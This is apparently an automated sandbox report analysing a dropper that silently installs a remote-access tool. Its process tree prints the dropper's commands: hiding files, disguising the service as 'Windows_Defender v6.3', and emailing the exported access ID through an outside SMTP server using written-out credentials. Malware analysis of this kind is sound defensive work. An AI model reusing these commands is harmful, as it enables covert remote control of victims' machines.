Overview
overview
10Static
static
8install.bat
windows7_x64
10install.bat
windows10-2004_x64
10install.vbs
windows7_x64
10install.vbs
windows10-2004_x64
10mailsend.exe
windows7_x64
1mailsend.exe
windows10-2004_x64
1rfusclient.exe
windows7_x64
1rfusclient.exe
windows10-2004_x64
1rutserv.exe
windows7_x64
10rutserv.exe
windows10-2004_x64
10vp8decoder.dll
windows7_x64
1vp8decoder.dll
windows10-2004_x64
1vp8encoder.dll
windows7_x64
1vp8encoder.dll
windows10-2004_x64
1Analysis
-
max time kernel
4294226s -
max time network
179s -
platform
windows7_x64 -
resource
win7-20220311-en -
submitted
17-03-2022 01:27
Static task
static1
Behavioral task
behavioral1
Sample
install.bat
Resource
win7-20220311-en
Behavioral task
behavioral2
Sample
install.bat
Resource
win10v2004-20220310-en
Behavioral task
behavioral3
Sample
install.vbs
Resource
win7-20220311-en
Behavioral task
behavioral4
Sample
install.vbs
Resource
win10v2004-en-20220113
Behavioral task
behavioral5
Sample
mailsend.exe
Resource
win7-20220310-en
Behavioral task
behavioral6
Sample
mailsend.exe
Resource
win10v2004-en-20220113
Behavioral task
behavioral7
Sample
rfusclient.exe
Resource
win7-20220310-en
Behavioral task
behavioral8
Sample
rfusclient.exe
Resource
win10v2004-en-20220113
Behavioral task
behavioral9
Sample
rutserv.exe
Resource
win7-20220311-en
Behavioral task
behavioral10
Sample
rutserv.exe
Resource
win10v2004-20220310-en
Behavioral task
behavioral11
Sample
vp8decoder.dll
Resource
win7-20220311-en
Behavioral task
behavioral12
Sample
vp8decoder.dll
Resource
win10v2004-20220310-en
Behavioral task
behavioral13
Sample
vp8encoder.dll
Resource
win7-20220311-en
Behavioral task
behavioral14
Sample
vp8encoder.dll
Resource
win10v2004-20220310-en
General
-
Target
install.vbs
-
Size
120B
-
MD5
c719a030434d3fa96d62868f27e904a6
-
SHA1
f2f750a752dd1fda8915a47b082af7cf2d3e3655
-
SHA256
2696ee4302a85c6b4101fc6d1ce8e38b94fd9c2bbd1acc73b553576b3aacb92f
-
SHA512
47a9367f7596d19c0636766cd34ca3701d3b1239a284f2333fd04a48422f53b0df21002fd38a4f229f6a2f9f9e8163267e13ecb24d9ce6de1863d5f59ab04ff0
Malware Config
Signatures
-
Drops file in Program Files directory 1 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Common Files\System attrib.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Delays execution with timeout.exe 3 IoCs
pid Process 556 timeout.exe 1524 timeout.exe 808 timeout.exe -
Kills process with taskkill 4 IoCs
pid Process 1708 taskkill.exe 1788 taskkill.exe 828 taskkill.exe 1840 taskkill.exe -
Modifies data under HKEY_USERS 47 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rutserv.exe -
Runs .reg file with regedit 1 IoCs
pid Process 1000 regedit.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 4 IoCs
pid Process 996 rutserv.exe 1492 rutserv.exe 928 rutserv.exe 428 mailsend.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 996 rutserv.exe 996 rutserv.exe 996 rutserv.exe 996 rutserv.exe 996 rutserv.exe 996 rutserv.exe 1492 rutserv.exe 1492 rutserv.exe 1492 rutserv.exe 1492 rutserv.exe 928 rutserv.exe 928 rutserv.exe 928 rutserv.exe 928 rutserv.exe 1936 rutserv.exe 1936 rutserv.exe 1936 rutserv.exe 1936 rutserv.exe 1936 rutserv.exe 1936 rutserv.exe 1952 rfusclient.exe 1652 rutserv.exe 1652 rutserv.exe 1652 rutserv.exe 1652 rutserv.exe 1652 rutserv.exe 1652 rutserv.exe 1428 rfusclient.exe 920 rutserv.exe 920 rutserv.exe 920 rutserv.exe 920 rutserv.exe 920 rutserv.exe 920 rutserv.exe 1416 rfusclient.exe 1644 rutserv.exe 1644 rutserv.exe 1644 rutserv.exe 1644 rutserv.exe 1644 rutserv.exe 1644 rutserv.exe 928 rfusclient.exe 1936 rutserv.exe 1936 rutserv.exe 1936 rutserv.exe 1936 rutserv.exe 1936 rutserv.exe 1936 rutserv.exe 628 rfusclient.exe 1672 rutserv.exe 1672 rutserv.exe 1672 rutserv.exe 1672 rutserv.exe 1672 rutserv.exe 1672 rutserv.exe 2024 rfusclient.exe 1452 rutserv.exe 1452 rutserv.exe 1452 rutserv.exe 1452 rutserv.exe 1452 rutserv.exe 1452 rutserv.exe 584 rfusclient.exe 936 rutserv.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 984 rfusclient.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1788 taskkill.exe Token: SeDebugPrivilege 828 taskkill.exe Token: SeDebugPrivilege 1840 taskkill.exe Token: SeDebugPrivilege 1708 taskkill.exe Token: SeDebugPrivilege 996 rutserv.exe Token: SeDebugPrivilege 928 rutserv.exe Token: SeTakeOwnershipPrivilege 1936 rutserv.exe Token: SeTcbPrivilege 1936 rutserv.exe Token: SeTcbPrivilege 1936 rutserv.exe Token: SeTakeOwnershipPrivilege 1652 rutserv.exe Token: SeTcbPrivilege 1652 rutserv.exe Token: SeTcbPrivilege 1652 rutserv.exe Token: SeTakeOwnershipPrivilege 920 rutserv.exe Token: SeTcbPrivilege 920 rutserv.exe Token: SeTcbPrivilege 920 rutserv.exe Token: SeTakeOwnershipPrivilege 1644 rutserv.exe Token: SeTcbPrivilege 1644 rutserv.exe Token: SeTcbPrivilege 1644 rutserv.exe Token: SeTakeOwnershipPrivilege 1936 rutserv.exe Token: SeTcbPrivilege 1936 rutserv.exe Token: SeTcbPrivilege 1936 rutserv.exe Token: SeTakeOwnershipPrivilege 1672 rutserv.exe Token: SeTcbPrivilege 1672 rutserv.exe Token: SeTcbPrivilege 1672 rutserv.exe Token: SeTakeOwnershipPrivilege 1452 rutserv.exe Token: SeTcbPrivilege 1452 rutserv.exe Token: SeTcbPrivilege 1452 rutserv.exe Token: SeTakeOwnershipPrivilege 936 rutserv.exe Token: SeTcbPrivilege 936 rutserv.exe Token: SeTcbPrivilege 936 rutserv.exe Token: SeTakeOwnershipPrivilege 1800 rutserv.exe Token: SeTcbPrivilege 1800 rutserv.exe Token: SeTcbPrivilege 1800 rutserv.exe Token: SeTakeOwnershipPrivilege 1676 rutserv.exe Token: SeTcbPrivilege 1676 rutserv.exe Token: SeTcbPrivilege 1676 rutserv.exe Token: SeTakeOwnershipPrivilege 1744 rutserv.exe Token: SeTcbPrivilege 1744 rutserv.exe Token: SeTcbPrivilege 1744 rutserv.exe Token: SeTakeOwnershipPrivilege 940 rutserv.exe Token: SeTcbPrivilege 940 rutserv.exe Token: SeTcbPrivilege 940 rutserv.exe Token: SeTakeOwnershipPrivilege 1536 rutserv.exe Token: SeTcbPrivilege 1536 rutserv.exe Token: SeTcbPrivilege 1536 rutserv.exe Token: SeTakeOwnershipPrivilege 1600 rutserv.exe Token: SeTcbPrivilege 1600 rutserv.exe Token: SeTcbPrivilege 1600 rutserv.exe Token: SeTakeOwnershipPrivilege 1184 rutserv.exe Token: SeTcbPrivilege 1184 rutserv.exe Token: SeTcbPrivilege 1184 rutserv.exe Token: SeTakeOwnershipPrivilege 1976 rutserv.exe Token: SeTcbPrivilege 1976 rutserv.exe Token: SeTcbPrivilege 1976 rutserv.exe Token: SeTakeOwnershipPrivilege 1076 rutserv.exe Token: SeTcbPrivilege 1076 rutserv.exe Token: SeTcbPrivilege 1076 rutserv.exe Token: SeTakeOwnershipPrivilege 2008 rutserv.exe Token: SeTcbPrivilege 2008 rutserv.exe Token: SeTcbPrivilege 2008 rutserv.exe Token: SeTakeOwnershipPrivilege 1224 rutserv.exe Token: SeTcbPrivilege 1224 rutserv.exe Token: SeTcbPrivilege 1224 rutserv.exe Token: SeTakeOwnershipPrivilege 1552 rutserv.exe -
Suspicious use of SetWindowsHookEx 64 IoCs
pid Process 996 rutserv.exe 996 rutserv.exe 996 rutserv.exe 996 rutserv.exe 1492 rutserv.exe 1492 rutserv.exe 1492 rutserv.exe 1492 rutserv.exe 928 rutserv.exe 928 rutserv.exe 928 rutserv.exe 928 rutserv.exe 1936 rutserv.exe 1936 rutserv.exe 1936 rutserv.exe 1936 rutserv.exe 1652 rutserv.exe 1652 rutserv.exe 1652 rutserv.exe 1652 rutserv.exe 920 rutserv.exe 920 rutserv.exe 920 rutserv.exe 920 rutserv.exe 1644 rutserv.exe 1644 rutserv.exe 1644 rutserv.exe 1644 rutserv.exe 1936 rutserv.exe 1936 rutserv.exe 1936 rutserv.exe 1936 rutserv.exe 1672 rutserv.exe 1672 rutserv.exe 1672 rutserv.exe 1672 rutserv.exe 1452 rutserv.exe 1452 rutserv.exe 1452 rutserv.exe 1452 rutserv.exe 936 rutserv.exe 936 rutserv.exe 936 rutserv.exe 936 rutserv.exe 1800 rutserv.exe 1800 rutserv.exe 1800 rutserv.exe 1800 rutserv.exe 1676 rutserv.exe 1676 rutserv.exe 1676 rutserv.exe 1676 rutserv.exe 1744 rutserv.exe 1744 rutserv.exe 1744 rutserv.exe 1744 rutserv.exe 940 rutserv.exe 940 rutserv.exe 940 rutserv.exe 940 rutserv.exe 1536 rutserv.exe 1536 rutserv.exe 1536 rutserv.exe 1536 rutserv.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 976 wrote to memory of 1656 976 WScript.exe 27 PID 976 wrote to memory of 1656 976 WScript.exe 27 PID 976 wrote to memory of 1656 976 WScript.exe 27 PID 976 wrote to memory of 1656 976 WScript.exe 27 PID 976 wrote to memory of 1656 976 WScript.exe 27 PID 1656 wrote to memory of 872 1656 cmd.exe 29 PID 1656 wrote to memory of 872 1656 cmd.exe 29 PID 1656 wrote to memory of 872 1656 cmd.exe 29 PID 1656 wrote to memory of 1400 1656 cmd.exe 30 PID 1656 wrote to memory of 1400 1656 cmd.exe 30 PID 1656 wrote to memory of 1400 1656 cmd.exe 30 PID 1656 wrote to memory of 1788 1656 cmd.exe 31 PID 1656 wrote to memory of 1788 1656 cmd.exe 31 PID 1656 wrote to memory of 1788 1656 cmd.exe 31 PID 1656 wrote to memory of 828 1656 cmd.exe 33 PID 1656 wrote to memory of 828 1656 cmd.exe 33 PID 1656 wrote to memory of 828 1656 cmd.exe 33 PID 1656 wrote to memory of 1840 1656 cmd.exe 34 PID 1656 wrote to memory of 1840 1656 cmd.exe 34 PID 1656 wrote to memory of 1840 1656 cmd.exe 34 PID 1656 wrote to memory of 1708 1656 cmd.exe 35 PID 1656 wrote to memory of 1708 1656 cmd.exe 35 PID 1656 wrote to memory of 1708 1656 cmd.exe 35 PID 1656 wrote to memory of 1440 1656 cmd.exe 36 PID 1656 wrote to memory of 1440 1656 cmd.exe 36 PID 1656 wrote to memory of 1440 1656 cmd.exe 36 PID 1656 wrote to memory of 1000 1656 cmd.exe 37 PID 1656 wrote to memory of 1000 1656 cmd.exe 37 PID 1656 wrote to memory of 1000 1656 cmd.exe 37 PID 1656 wrote to memory of 1524 1656 cmd.exe 38 PID 1656 wrote to memory of 1524 1656 cmd.exe 38 PID 1656 wrote to memory of 1524 1656 cmd.exe 38 PID 1656 wrote to memory of 996 1656 cmd.exe 39 PID 1656 wrote to memory of 996 1656 cmd.exe 39 PID 1656 wrote to memory of 996 1656 cmd.exe 39 PID 1656 wrote to memory of 996 1656 cmd.exe 39 PID 1656 wrote to memory of 1492 1656 cmd.exe 40 PID 1656 wrote to memory of 1492 1656 cmd.exe 40 PID 1656 wrote to memory of 1492 1656 cmd.exe 40 PID 1656 wrote to memory of 1492 1656 cmd.exe 40 PID 1656 wrote to memory of 928 1656 cmd.exe 41 PID 1656 wrote to memory of 928 1656 cmd.exe 41 PID 1656 wrote to memory of 928 1656 cmd.exe 41 PID 1656 wrote to memory of 928 1656 cmd.exe 41 PID 1936 wrote to memory of 1952 1936 rutserv.exe 43 PID 1936 wrote to memory of 1952 1936 rutserv.exe 43 PID 1936 wrote to memory of 1952 1936 rutserv.exe 43 PID 1936 wrote to memory of 1952 1936 rutserv.exe 43 PID 1936 wrote to memory of 868 1936 rutserv.exe 44 PID 1936 wrote to memory of 868 1936 rutserv.exe 44 PID 1936 wrote to memory of 868 1936 rutserv.exe 44 PID 1936 wrote to memory of 868 1936 rutserv.exe 44 PID 1656 wrote to memory of 1956 1656 cmd.exe 63 PID 1656 wrote to memory of 1956 1656 cmd.exe 63 PID 1656 wrote to memory of 1956 1656 cmd.exe 63 PID 1656 wrote to memory of 840 1656 cmd.exe 46 PID 1656 wrote to memory of 840 1656 cmd.exe 46 PID 1656 wrote to memory of 840 1656 cmd.exe 46 PID 1656 wrote to memory of 1216 1656 cmd.exe 48 PID 1656 wrote to memory of 1216 1656 cmd.exe 48 PID 1656 wrote to memory of 1216 1656 cmd.exe 48 PID 1656 wrote to memory of 808 1656 cmd.exe 50 PID 1656 wrote to memory of 808 1656 cmd.exe 50 PID 1656 wrote to memory of 808 1656 cmd.exe 50 -
Views/modifies file attributes 1 TTPs 7 IoCs
pid Process 1892 attrib.exe 1372 attrib.exe 872 attrib.exe 1400 attrib.exe 1396 attrib.exe 872 attrib.exe 392 attrib.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:976 -
C:\Windows\System32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\install.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:1656 -
C:\Windows\system32\attrib.exeattrib "C:\Program Files (x86)\System" +H +S /S /D3⤵
- Drops file in Program Files directory
- Views/modifies file attributes
PID:872
-
-
C:\Windows\system32\attrib.exeattrib "C:\Program Files (x86)\System\*.*" +H +S /S /D3⤵
- Views/modifies file attributes
PID:1400
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im rutserv.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1788
-
-
C:\Windows\system32\taskkill.exeTaskkill /f /im rutserv.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:828
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im rfusclient.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1840
-
-
C:\Windows\system32\taskkill.exeTaskkill /f /im rfusclient.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1708
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\Remote Manipulator System" /f3⤵PID:1440
-
-
C:\Windows\regedit.exeregedit /s "regedit.reg"3⤵
- Runs .reg file with regedit
PID:1000
-
-
C:\Windows\system32\timeout.exetimeout 23⤵
- Delays execution with timeout.exe
PID:1524
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exerutserv.exe /silentinstall3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:996
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exerutserv.exe /firewall3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1492
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exerutserv.exe /start3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:928
-
-
C:\Windows\system32\sc.exesc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/10003⤵PID:1956
-
-
C:\Windows\system32\sc.exesc config RManService obj= LocalSystem type= interact type= own3⤵PID:840
-
-
C:\Windows\system32\sc.exesc config RManService DisplayName= "Windows_Defender v6.3"3⤵PID:1216
-
-
C:\Windows\system32\timeout.exetimeout 1203⤵
- Delays execution with timeout.exe
PID:808
-
-
C:\Windows\system32\reg.exereg export "HKEY_LOCAL_MACHINE\SYSTEM\Remote Manipulator System\v4" "id.txt"3⤵PID:1972
-
-
C:\Windows\system32\timeout.exetimeout 103⤵
- Delays execution with timeout.exe
PID:556
-
-
C:\Users\Admin\AppData\Local\Temp\mailsend.exemailsend.exe -t [email protected] -attach id.txt,application/txt -sub "RMS" -smtp smtp.yandex.ru -port 465 -f [email protected] -name "RMS" -ssl -auth-login -user rms.vaganov.vitaliy -pass hackerloladmin@0443 -q3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:428
-
-
C:\Windows\system32\attrib.exeattrib "C:\Program Files (x86)\System\regedit.reg" -S -H /S /D3⤵
- Views/modifies file attributes
PID:1396
-
-
C:\Windows\system32\attrib.exeattrib "C:\Program Files (x86)\System\mailsend.exe" -S -H /S /D3⤵
- Views/modifies file attributes
PID:872
-
-
C:\Windows\system32\attrib.exeattrib "C:\Program Files (x86)\System\id.txt" -S -H /S /D3⤵
- Views/modifies file attributes
PID:392
-
-
C:\Windows\system32\attrib.exeattrib "C:\Program Files (x86)\System\install.vbs" -S -H /S /D3⤵
- Views/modifies file attributes
PID:1892
-
-
C:\Windows\system32\attrib.exeattrib "C:\Program Files (x86)\System\install.bat" -S -H /S /D3⤵
- Views/modifies file attributes
PID:1372
-
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1936 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1952 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray3⤵PID:1436
-
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:868
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1652 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:984
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1428
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:920 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1416
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:836
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1644 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵
- Suspicious behavior: EnumeratesProcesses
PID:928
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:1448
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1936 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵
- Suspicious behavior: EnumeratesProcesses
PID:628
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:1956
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1672 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2024
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:1408
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1452 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:836
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵
- Suspicious behavior: EnumeratesProcesses
PID:584
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:936 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵PID:532
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:428
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1800 -
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe2⤵PID:1528
-
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeC:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray2⤵PID:1932
-
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe"C:\Users\Admin\AppData\Local\Temp\rutserv.exe"1⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1676 -
